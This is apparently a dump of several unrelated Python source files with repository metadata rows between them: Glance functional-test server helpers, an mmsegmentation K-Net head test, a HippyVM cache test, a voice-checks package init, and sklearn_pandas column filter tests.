launch_msg = self.wait_for_servers([server], expect_launch)
self.assertTrue(launch_msg is None, launch_msg)
def start_with_retry(self, server, port_name, max_retries,
expect_launch=True,
**kwargs):
"""
Starts a server, with retries if the server launches but
fails to start listening on the expected port.
:param server: the server to launch
:param port_name: the name of the port attribute
:param max_retries: the maximum number of attempts
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
"""
launch_msg = None
for i in range(max_retries):
exitcode, out, err = server.start(expect_exit=not expect_launch,
**kwargs)
name = server.server_name
self.assertEqual(0, exitcode,
"Failed to spin up the %s server. "
"Got: %s" % (name, err))
launch_msg = self.wait_for_servers([server], expect_launch)
if launch_msg:
server.stop()
server.bind_port = get_unused_port()
setattr(self, port_name, server.bind_port)
else:
self.launched_servers.append(server)
break
self.assertTrue(launch_msg is None, launch_msg)
def start_servers(self, **kwargs):
"""
Starts the API and Registry servers (glance-control api start
) on unused ports. glance-control
should be installed into the python path
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
self.cleanup()
# Start up the API server
self.start_with_retry(self.api_server_multiple_backend,
'api_port', 3, **kwargs)
if self.include_scrubber:
exitcode, out, err = self.scrubber_daemon.start(**kwargs)
self.assertEqual(0, exitcode,
"Failed to spin up the Scrubber daemon. "
"Got: %s" % err)
def ping_server(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def ping_server_ipv6(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
The function uses IPv6 (therefore AF_INET6 and ::1).
"""
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
try:
s.connect(("::1", port))
return True
except socket.error:
return False
finally:
s.close()
def wait_for_servers(self, servers, expect_launch=True, timeout=30):
"""
Tight loop, waiting for the given server port(s) to be available.
Returns when all are pingable. There is a timeout on waiting
for the servers to come up.
:param servers: Glance server ports to ping
:param expect_launch: Optional, true iff the server(s) are
expected to successfully start
:param timeout: Optional, defaults to 30 seconds
:returns: None if launch expectation is met, otherwise an
assertion message
"""
now = datetime.datetime.now()
timeout_time = now + datetime.timedelta(seconds=timeout)
replied = []
while (timeout_time > now):
pinged = 0
for server in servers:
if self.ping_server(server.bind_port):
pinged += 1
if server not in replied:
replied.append(server)
if pinged == len(servers):
msg = 'Unexpected server launch status'
return None if expect_launch else msg
now = datetime.datetime.now()
time.sleep(0.05)
failed = list(set(servers) - set(replied))
msg = 'Unexpected server launch status for: '
for f in failed:
msg += ('%s, ' % f.server_name)
if os.path.exists(f.pid_file):
pid = f.process_pid
trace = f.pid_file.replace('.pid', '.trace')
if self.tracecmd:
cmd = '%s -p %d -o %s' % (self.tracecmd, pid, trace)
try:
execute(cmd, raise_error=False, expect_exit=False)
except OSError as e:
if e.errno == errno.ENOENT:
raise RuntimeError('No executable found for "%s" '
'command.' % self.tracecmd)
else:
raise
time.sleep(0.5)
if os.path.exists(trace):
msg += ('\n%s:\n%s\n' % (self.tracecmd,
open(trace).read()))
self.add_log_details(failed)
return msg if expect_launch else None
def stop_server(self, server):
"""
Called to stop a single server in a normal fashion using the
glance-control stop method to gracefully shut the server down.
:param server: the server to stop
"""
# Spin down the requested server
server.stop()
def stop_servers(self):
"""
Called to stop the started servers in a normal fashion. Note
that cleanup() will stop the servers using a fairly draconian
method of sending a SIGTERM signal to the servers. Here, we use
the glance-control stop method to gracefully shut the server down.
This method also asserts that the shutdown was clean, and so it
is meant to be called during a normal test case sequence.
"""
# Spin down the API
self.stop_server(self.api_server_multiple_backend)
if self.include_scrubber:
self.stop_server(self.scrubber_daemon)
def run_sql_cmd(self, sql):
"""
Provides a crude mechanism to run manual SQL commands for backend
DB verification within the functional tests.
The raw result set is returned.
"""
engine = db_api.get_engine()
return engine.execute(sql)
def copy_data_file(self, file_name, dst_dir):
src_file_name = os.path.join('glance/tests/etc', file_name)
shutil.copy(src_file_name, dst_dir)
dst_file_name = os.path.join(dst_dir, file_name)
return dst_file_name
def add_log_details_on_exception(self, *args, **kwargs):
self.add_log_details()
def add_log_details(self, servers=None):
for s in servers or self.launched_servers:
if s.log_file not in self._attached_server_logs:
self._attached_server_logs.append(s.log_file)
self.addDetail(
s.server_name, testtools.content.text_content(s.dump_log()))
class SynchronousAPIBase(test_utils.BaseTestCase):
"""A base class that provides synchronous calling into the API.
This provides a way to directly call into the API WSGI stack
without starting a separate server, and with a simple paste
pipeline. Configured with multi-store and a real database.
This differs from the FunctionalTest lineage above in that they
start a full copy of the API server as a separate process, whereas
this calls directly into the WSGI stack. This test base is
appropriate for situations where you need to be able to mock the
state of the world (i.e. warp time, or inject errors) but should
not be used for happy-path testing where FunctionalTest provides
more isolation.
To use this, inherit and run start_server() before you are ready
to make API calls (either in your setUp() or per-test if you need
to change config or mocking).
Once started, use the api_get(), api_put(), api_post(), and
api_delete() methods to make calls to the API.
"""
TENANT = str(uuid.uuid4())
@mock.patch('oslo_db.sqlalchemy.enginefacade.writer.get_engine')
def setup_database(self, mock_get_engine):
"""Configure and prepare a fresh sqlite database."""
db_file = 'sqlite:///%s/test.db' % self.test_dir
self.config(connection=db_file, group='database')
# NOTE(danms): Make sure that we clear the current global
# database configuration, provision a temporary database file,
# and run migrations with our configuration to define the
# schema there.
db_api.clear_db_env()
engine = db_api.get_engine()
mock_get_engine.return_value = engine
with mock.patch('logging.config'):
# NOTE(danms): The alembic config in the env module will break our
# BaseTestCase logging setup. So mock that out to prevent it while
# we db_sync.
test_utils.db_sync(engine=engine)
def setup_simple_paste(self):
"""Setup a very simple no-auth paste pipeline.
This configures the API to be very direct, including only the
middleware absolutely required for consistent API calls.
"""
self.paste_config = os.path.join(self.test_dir, 'glance-api-paste.ini')
with open(self.paste_config, 'w') as f:
f.write(textwrap.dedent("""
[filter:context]
paste.filter_factory = glance.api.middleware.context:\
ContextMiddleware.factory
[filter:fakeauth]
paste.filter_factory = glance.tests.utils:\
FakeAuthMiddleware.factory
[pipeline:glance-api]
pipeline = context rootapp
[composite:rootapp]
paste.composite_factory = glance.api:root_app_factory
/v2: apiv2app
[app:apiv2app]
paste.app_factory = glance.api.v2.router:API.factory
"""))
def _store_dir(self, store):
return os.path.join(self.test_dir, store)
def setup_stores(self):
"""Configures multiple backend stores.
This configures the API with three file-backed stores (store1,
store2, and store3) as well as a os_glance_staging_store for
imports.
"""
self.config(enabled_backends={'store1': 'file', 'store2': 'file',
'store3': 'file'})
glance_store.register_store_opts(CONF,
reserved_stores=wsgi.RESERVED_STORES)
self.config(default_backend='store1',
group='glance_store')
self.config(filesystem_store_datadir=self._store_dir('store1'),
group='store1')
self.config(filesystem_store_datadir=self._store_dir('store2'),
group='store2')
self.config(filesystem_store_datadir=self._store_dir('store3'),
group='store3')
self.config(filesystem_store_datadir=self._store_dir('staging'),
group='os_glance_staging_store')
glance_store.create_multi_stores(CONF,
reserved_stores=wsgi.RESERVED_STORES)
glance_store.verify_store()
def setUp(self):
super(SynchronousAPIBase, self).setUp()
self.setup_database()
self.setup_simple_paste()
self.setup_stores()
def start_server(self):
"""Builds and "starts" the API server.
Note that this doesn't actually "start" anything like
FunctionalTest does above, but that terminology is used here
to make it seem like the same sort of pattern.
"""
config.set_config_defaults()
self.api = config.load_paste_app('glance-api',
conf_file=self.paste_config)
def _headers(self, custom_headers=None):
base_headers = {
'X-Identity-Status': 'Confirmed',
'X-Auth-Token': '932c5c84-02ac-4fe5-a9ba-620af0e2bb96',
'X-User-Id': 'f9a41d13-0c13-47e9-bee2-ce4e8bfe958e',
'X-Tenant-Id': self.TENANT,
'Content-Type': 'application/json',
'X-Roles': 'admin',
}
base_headers.update(custom_headers or {})
return base_headers
def api_request(self, method, url, headers=None, data=None,
json=None, body_file=None):
"""Perform a request against the API.
NOTE: Most code should use api_get(), api_post(), api_put(),
or api_delete() instead!
:param method: The HTTP method to use (i.e. GET, POST, etc)
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:param data: Optional bytes data payload to send (overrides @json)
:param json: Optional dict structure to be jsonified and sent as
the payload (mutually exclusive with @data)
:param body_file: Optional io.IOBase to provide as the input data
stream for the request (overrides @data)
:returns: A webob.Response object
"""
headers = self._headers(headers)
req = webob.Request.blank(url, method=method,
headers=headers)
if json and not data:
data = jsonutils.dumps(json).encode()
if data and not body_file:
req.body = data
elif body_file:
req.body_file = body_file
return self.api(req)
def api_get(self, url, headers=None):
"""Perform a GET request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:returns: A webob.Response object
"""
return self.api_request('GET', url, headers=headers)
def api_post(self, url, headers=None, data=None, json=None,
body_file=None):
"""Perform a POST request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:param data: Optional bytes data payload to send (overrides @json)
:param json: Optional dict structure to be jsonified and sent as
the payload (mutually exclusive with @data)
:param body_file: Optional io.IOBase to provide as the input data
stream for the request (overrides @data)
:returns: A webob.Response object
"""
return self.api_request('POST', url, headers=headers,
data=data, json=json,
body_file=body_file)
def api_put(self, url, headers=None, data=None, json=None, body_file=None):
"""Perform a PUT request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:param data: Optional bytes data payload to send (overrides @json,
mutually exclusive with body_file)
:param json: Optional dict structure to be jsonified and sent as
the payload (mutually exclusive with @data)
:param body_file: Optional io.IOBase to provide as the input data
stream for the request (overrides @data)
:returns: A webob.Response object
"""
return self.api_request('PUT', url, headers=headers,
data=data, json=json,
body_file=body_file)
def api_delete(self, url, headers=None):
"""Perform a DELETE request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:returns: A webob.Response object
"""
return self.api_request('DELETE', url, heaers=headers)
| 37.536773 | 79 | 0.619053 | 7,817 | 63,287 | 4.82909 | 0.106691 | 0.008345 | 0.011656 | 0.007417 | 0.75557 | 0.746642 | 0.726827 | 0.717158 | 0.70439 | 0.700866 | 0 | 0.007671 | 0.297628 | 63,287 | 1,685 | 80 | 37.55905 | 0.841556 | 0.237426 | 0 | 0.706767 | 0 | 0 | 0.237082 | 0.103475 | 0 | 0 | 0 | 0 | 0.011278 | 1 | 0.058271 | false | 0.016917 | 0.032895 | 0.00094 | 0.138158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6845a6d3fbaef07810fdf01930da0d08838863c | 6,292 | py | Python | tests/test_models/test_heads/test_knet_head.py | rehohoho/mmsegmentation | a73ae7a421e07741fda62c9d81b335cbc4b7f7d6 | [
"Apache-2.0"
] | 1 | 2022-03-07T19:46:03.000Z | 2022-03-07T19:46:03.000Z | tests/test_models/test_heads/test_knet_head.py | rehohoho/mmsegmentation | a73ae7a421e07741fda62c9d81b335cbc4b7f7d6 | [
"Apache-2.0"
] | 2 | 2022-02-25T03:07:23.000Z | 2022-03-08T12:54:05.000Z | tests/test_models/test_heads/test_knet_head.py | rehohoho/mmsegmentation | a73ae7a421e07741fda62c9d81b335cbc4b7f7d6 | [
"Apache-2.0"
] | 1 | 2022-01-04T01:16:12.000Z | 2022-01-04T01:16:12.000Z | # Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmseg.models.decode_heads.knet_head import (IterativeDecodeHead,
KernelUpdateHead)
from .utils import to_cuda
num_stages = 3
conv_kernel_size = 1
kernel_updator_cfg = dict(
type='KernelUpdator',
in_channels=16,
feat_channels=16,
out_channels=16,
gate_norm_act=True,
activate_out=True,
act_cfg=dict(type='ReLU', inplace=True),
norm_cfg=dict(type='LN'))
def test_knet_head():
# test init function of kernel update head
kernel_update_head = KernelUpdateHead(
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=dict(conv_cfg=dict(type='Conv2d'), act_cfg=None),
kernel_init=True,
kernel_updator_cfg=kernel_updator_cfg)
kernel_update_head.init_weights()
head = IterativeDecodeHead(
num_stages=num_stages,
kernel_update_head=[
dict(
type='KernelUpdateHead',
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=dict(
conv_cfg=dict(type='Conv2d'), act_cfg=None),
kernel_init=False,
kernel_updator_cfg=kernel_updator_cfg)
for _ in range(num_stages)
],
kernel_generate_head=dict(
type='FCNHead',
in_channels=128,
in_index=3,
channels=32,
num_convs=2,
concat_input=True,
dropout_ratio=0.1,
num_classes=150,
align_corners=False))
head.init_weights()
inputs = [
torch.randn(1, 16, 27, 32),
torch.randn(1, 32, 27, 16),
torch.randn(1, 64, 27, 16),
torch.randn(1, 128, 27, 16)
]
if torch.cuda.is_available():
head, inputs = to_cuda(head, inputs)
outputs = head(inputs)
assert outputs[-1].shape == (1, head.num_classes, 27, 16)
# test whether only return the prediction of
# the last stage during testing
with torch.no_grad():
head.eval()
outputs = head(inputs)
assert outputs.shape == (1, head.num_classes, 27, 16)
# test K-Net without `feat_transform_cfg`
head = IterativeDecodeHead(
num_stages=num_stages,
kernel_update_head=[
dict(
type='KernelUpdateHead',
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=None,
kernel_updator_cfg=kernel_updator_cfg)
for _ in range(num_stages)
],
kernel_generate_head=dict(
type='FCNHead',
in_channels=128,
in_index=3,
channels=32,
num_convs=2,
concat_input=True,
dropout_ratio=0.1,
num_classes=150,
align_corners=False))
head.init_weights()
inputs = [
torch.randn(1, 16, 27, 32),
torch.randn(1, 32, 27, 16),
torch.randn(1, 64, 27, 16),
torch.randn(1, 128, 27, 16)
]
if torch.cuda.is_available():
head, inputs = to_cuda(head, inputs)
outputs = head(inputs)
assert outputs[-1].shape == (1, head.num_classes, 27, 16)
# test K-Net with
# self.mask_transform_stride == 2 and self.feat_gather_stride == 1
head = IterativeDecodeHead(
num_stages=num_stages,
kernel_update_head=[
dict(
type='KernelUpdateHead',
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=dict(
conv_cfg=dict(type='Conv2d'), act_cfg=None),
kernel_init=False,
mask_transform_stride=2,
feat_gather_stride=1,
kernel_updator_cfg=kernel_updator_cfg)
for _ in range(num_stages)
],
kernel_generate_head=dict(
type='FCNHead',
in_channels=128,
in_index=3,
channels=32,
num_convs=2,
concat_input=True,
dropout_ratio=0.1,
num_classes=150,
align_corners=False))
head.init_weights()
inputs = [
torch.randn(1, 16, 27, 32),
torch.randn(1, 32, 27, 16),
torch.randn(1, 64, 27, 16),
torch.randn(1, 128, 27, 16)
]
if torch.cuda.is_available():
head, inputs = to_cuda(head, inputs)
outputs = head(inputs)
assert outputs[-1].shape == (1, head.num_classes, 26, 16)
# test loss function in K-Net
fake_label = torch.ones_like(
outputs[-1][:, 0:1, :, :], dtype=torch.int16).long()
loss = head.losses(seg_logit=outputs, seg_label=fake_label)
assert loss['loss_ce.s0'] != torch.zeros_like(loss['loss_ce.s0'])
assert loss['loss_ce.s1'] != torch.zeros_like(loss['loss_ce.s1'])
assert loss['loss_ce.s2'] != torch.zeros_like(loss['loss_ce.s2'])
assert loss['loss_ce.s3'] != torch.zeros_like(loss['loss_ce.s3'])
| 32.102041 | 76 | 0.555467 | 763 | 6,292 | 4.310616 | 0.166448 | 0.038918 | 0.040134 | 0.02554 | 0.761022 | 0.7519 | 0.712983 | 0.704165 | 0.704165 | 0.704165 | 0 | 0.056494 | 0.341704 | 6,292 | 195 | 77 | 32.266667 | 0.737566 | 0.048951 | 0 | 0.784884 | 0 | 0 | 0.033808 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 1 | 0.005814 | false | 0 | 0.017442 | 0 | 0.023256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc0a0d7c7ab8132cf7e51cd34672d1d708f3d4d7 | 2,719 | py | Python | testing/test_immut_cache.py | jweinraub/hippyvm | 09c7643aaa1c4ade566e8681abd2543f12bf874c | [
"MIT"
] | 289 | 2015-01-01T15:36:55.000Z | 2022-03-27T00:22:27.000Z | testing/test_immut_cache.py | jweinraub/hippyvm | 09c7643aaa1c4ade566e8681abd2543f12bf874c | [
"MIT"
] | 26 | 2015-01-21T16:34:41.000Z | 2020-08-26T15:12:54.000Z | testing/test_immut_cache.py | jweinraub/hippyvm | 09c7643aaa1c4ade566e8681abd2543f12bf874c | [
"MIT"
] | 35 | 2015-01-05T12:09:41.000Z | 2022-03-16T09:30:16.000Z | from testing.test_interpreter import BaseTestInterpreter
import uuid
class TestFunctionCache(BaseTestInterpreter):
def test_declare_function_call(self):
output = self.run('''
function myf2197123($a, $b) { return $a + $b; }
echo myf2197123(10, 20);
''')
assert self.space.int_w(output[0]) == 30
cell = self.space.global_function_cache.get_cell('myf2197123', object())
assert cell.constant_value_is_currently_declared
assert cell.constant_value is cell.currently_declared
#
output2 = self.run('''
function myf2197123($a, $b) { return $a - $b; }
echo myf2197123(100, 20);
''')
assert self.space.int_w(output2[0]) == 80
cell2 = self.space.global_function_cache.get_cell('myf2197123', object())
assert cell2 is cell
assert not cell2.constant_value_is_currently_declared
assert cell2.constant_value is not cell2.currently_declared
def test_declare_class(self):
class_name = "MyClass%s" % uuid.uuid4().hex
class_cache = self.space.global_class_cache
self.run("class %s { function f() { return 666;} };" % class_name)
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell.constant_value_is_currently_declared
assert cell.constant_value is cell.currently_declared
self.run("class %s { function f() { return 667;} };" % class_name)
cell2 = class_cache.get_cell(class_name, class_cache.version)
assert cell2 is cell
assert not cell2.constant_value_is_currently_declared
assert cell2.constant_value is not cell2.currently_declared
def test_has_definition(self):
output = self.run('''
define('fooBAR', 42);
''')
assert self.space.global_constant_cache.has_definition('fooBAR')
assert not self.space.global_constant_cache.has_definition('foobar')
def test_nonexistent_constant(self):
class_name = "MyClass%s" % uuid.uuid4().hex
class_cache = self.space.global_class_cache
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell is None
def test_nonexistent_constant_then_defined_later(self):
class_name = "MyClass%s" % uuid.uuid4().hex
class_cache = self.space.global_class_cache
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell is None
self.run("class %s { function f() { return 666;} };" % class_name)
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell.constant_value_is_currently_declared
assert cell.constant_value is cell.currently_declared
| 37.763889 | 81 | 0.678558 | 346 | 2,719 | 5.060694 | 0.182081 | 0.091376 | 0.085665 | 0.078812 | 0.809252 | 0.809252 | 0.785266 | 0.769275 | 0.715591 | 0.715591 | 0 | 0.039355 | 0.224347 | 2,719 | 71 | 82 | 38.295775 | 0.790896 | 0 | 0 | 0.584906 | 0 | 0 | 0.15379 | 0 | 0 | 0 | 0 | 0 | 0.339623 | 1 | 0.09434 | false | 0 | 0.037736 | 0 | 0.150943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc3a8ddcefec24db05c6bbc609d3f6f1923eb78d | 223 | py | Python | cd/modules/voice/checks/__init__.py | Axelware/cd-bot | d9b704d50b86ea25238242ae67c93e447b24636e | [
"MIT"
] | 1 | 2022-03-20T00:53:35.000Z | 2022-03-20T00:53:35.000Z | cd/modules/voice/checks/__init__.py | Axelware/cd-bot | d9b704d50b86ea25238242ae67c93e447b24636e | [
"MIT"
] | 1 | 2022-03-23T18:38:52.000Z | 2022-03-23T22:24:53.000Z | cd/modules/voice/checks/__init__.py | Axelware/cd-bot | d9b704d50b86ea25238242ae67c93e447b24636e | [
"MIT"
] | null | null | null | # Future
from __future__ import annotations
# Local
from .is_author_connected import *
from .is_player_connected import *
from .is_player_playing import *
from .is_queue_not_empty import *
from .is_track_seekable import *
| 22.3 | 34 | 0.816143 | 32 | 223 | 5.21875 | 0.46875 | 0.179641 | 0.287425 | 0.251497 | 0.323353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130045 | 223 | 9 | 35 | 24.777778 | 0.860825 | 0.053812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc87e384b5904ae118ad9ad45a0459eaeb134d13 | 6,244 | py | Python | sklearn_pandas/tests/test_Column_Filter.py | toddbenanzer/sklearn_pandas | 36e24c55ef4829aa261963201c346869097d4931 | [
"MIT"
] | null | null | null | sklearn_pandas/tests/test_Column_Filter.py | toddbenanzer/sklearn_pandas | 36e24c55ef4829aa261963201c346869097d4931 | [
"MIT"
] | null | null | null | sklearn_pandas/tests/test_Column_Filter.py | toddbenanzer/sklearn_pandas | 36e24c55ef4829aa261963201c346869097d4931 | [
"MIT"
] | null | null | null | import pytest
from sklearn_pandas.transformers.column_filter import *
def test_ColumnSelector_all_columns_ColumnSelector():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_out = pd.DataFrame({'A': [1, 1, ]})
cs = ColumnSelector(columns=None)
pd.testing.assert_frame_equal(df, cs.fit_transform(df))
def test_ColumnSelector_select_columns_ColumnSelector():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_out = pd.DataFrame({'A': [1, 1, ]})
cs = ColumnSelector(columns=['A'])
pd.testing.assert_frame_equal(expected_out, cs.fit_transform(df))
def test_ColumnSelector_reverse_order_ColumnSelector():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_out = pd.DataFrame({'B': [1, 1, ], 'A': [1, 1, ]})
cs = ColumnSelector(columns=['B', 'A'])
pd.testing.assert_frame_equal(expected_out, cs.fit_transform(df))
def test_DropColumns_no_columns_DropColumns():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
dc = DropColumns(columns=None)
pd.testing.assert_frame_equal(df, dc.fit_transform(df))
def test_DropColumns_one_columns_DropColumns():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_df = pd.DataFrame({'A': [1, 1, ], })
dc = DropColumns(columns=['B'])
pd.testing.assert_frame_equal(expected_df, dc.fit_transform(df))
def test_DropColumns_all_columns_DropColumns():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_df = pd.DataFrame({'A': [1, 1, ], })
dc = DropColumns(columns=['A', 'B'])
pd.testing.assert_frame_equal(
expected_df.drop(columns='A'), dc.fit_transform(df))
def test_ColumnSearchSelect_all_columns_ColumnSearchSelect():
df = pd.DataFrame(columns=['aa', 'ab', 'ba', 'bb', 'cc'])
css = ColumnSearchSelect()
pd.testing.assert_index_equal(df.columns, css.fit_transform(df).columns)
def test_ColumnSearchSelect_a_prefix_ColumnSearchSelect():
df = pd.DataFrame(columns=['aa', 'ab', 'ba', 'bb', 'cc'])
expected_df = pd.DataFrame(columns=['aa', 'ab', ])
css = ColumnSearchSelect(prefix='a')
pd.testing.assert_index_equal(
expected_df.columns, css.fit_transform(df).columns)
def test_ColumnSearchSelect_a_suffix_ColumnSearchSelect():
df = pd.DataFrame(columns=['aa', 'ab', 'ba', 'bb', 'cc'])
expected_df = pd.DataFrame(columns=['aa', 'ba', ])
css = ColumnSearchSelect(suffix='a')
pd.testing.assert_index_equal(
expected_df.columns, css.fit_transform(df).columns)
def test_UniqueValueFilter_keep_all_UniqueValueFilter():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 2, ]})
uvf = UniqueValueFilter(min_unique_values=1)
pd.testing.assert_frame_equal(df, uvf.fit_transform(df))
def test_UniqueValueFilter_keep_some_UniqueValueFilter():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 2, ]})
expected_df = pd.DataFrame({'B': [1, 2, ]})
uvf = UniqueValueFilter(min_unique_values=2)
pd.testing.assert_frame_equal(expected_df, uvf.fit_transform(df))
def test_UniqueValueFilter_keep_none_UniqueValueFilter():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 2, ]})
expected_df = pd.DataFrame({'B': [1, 2, ]}).drop(columns='B')
uvf = UniqueValueFilter(min_unique_values=3)
pd.testing.assert_frame_equal(expected_df, uvf.fit_transform(df))
def test_selector_numerics_ColumnByType():
df = pd.DataFrame(
{'A': [1, 1, ], 'B': ['a', 'b', ], 'C': [True, False, ], })
expected_df = pd.DataFrame({'A': [1, 1, ]})
filter = ColumnByType(numerics=True)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_selector_strings_ColumnByType():
df = pd.DataFrame(
{'A': [1, 1, ], 'B': ['a', 'b', ], 'C': [True, False, ], })
expected_df = pd.DataFrame({'B': ['a', 'b', ], })
filter = ColumnByType(strings=True)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_selector_booleans_ColumnByType():
df = pd.DataFrame(
{'A': [1, 1, ], 'B': ['a', 'b', ], 'C': [True, False, ], })
expected_df = pd.DataFrame({'C': [True, False, ], })
filter = ColumnByType(booleans=True)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_UniqueValueFilter_base_CorrelationFilter():
df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'B': [1, 2, 3, 4, 4, ],
'C': [1, 2, 3, 4, 4, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
expected_df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
filter = CorrelationFilter()
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_UniqueValueFilter_spearman_CorrelationFilter():
df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'B': [1, 2, 3, 4, 4, ],
'C': [1, 2, 3, 4, 4, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
expected_df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
filter = CorrelationFilter(method='spearman')
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_basic_function_PandasSelectKBest():
X = pd.DataFrame({
'A': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ],
'B': [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, ],
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
y = pd.DataFrame({
'y': [0, 1, 2, 1, 0, 1, 2, 1, 0, 1],
})
expected_df = pd.DataFrame({
'B': [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, ],
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
filter = PandasSelectKBest(k=2)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(X, y))
def test_basic_function_one_var_PandasSelectKBest():
X = pd.DataFrame({
'A': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ],
'B': [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, ],
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
y = pd.DataFrame({
'y': [0, 1, 2, 1, 0, 1, 2, 1, 0, 1],
})
expected_df = pd.DataFrame({
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
filter = PandasSelectKBest(k=1)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(X, y))
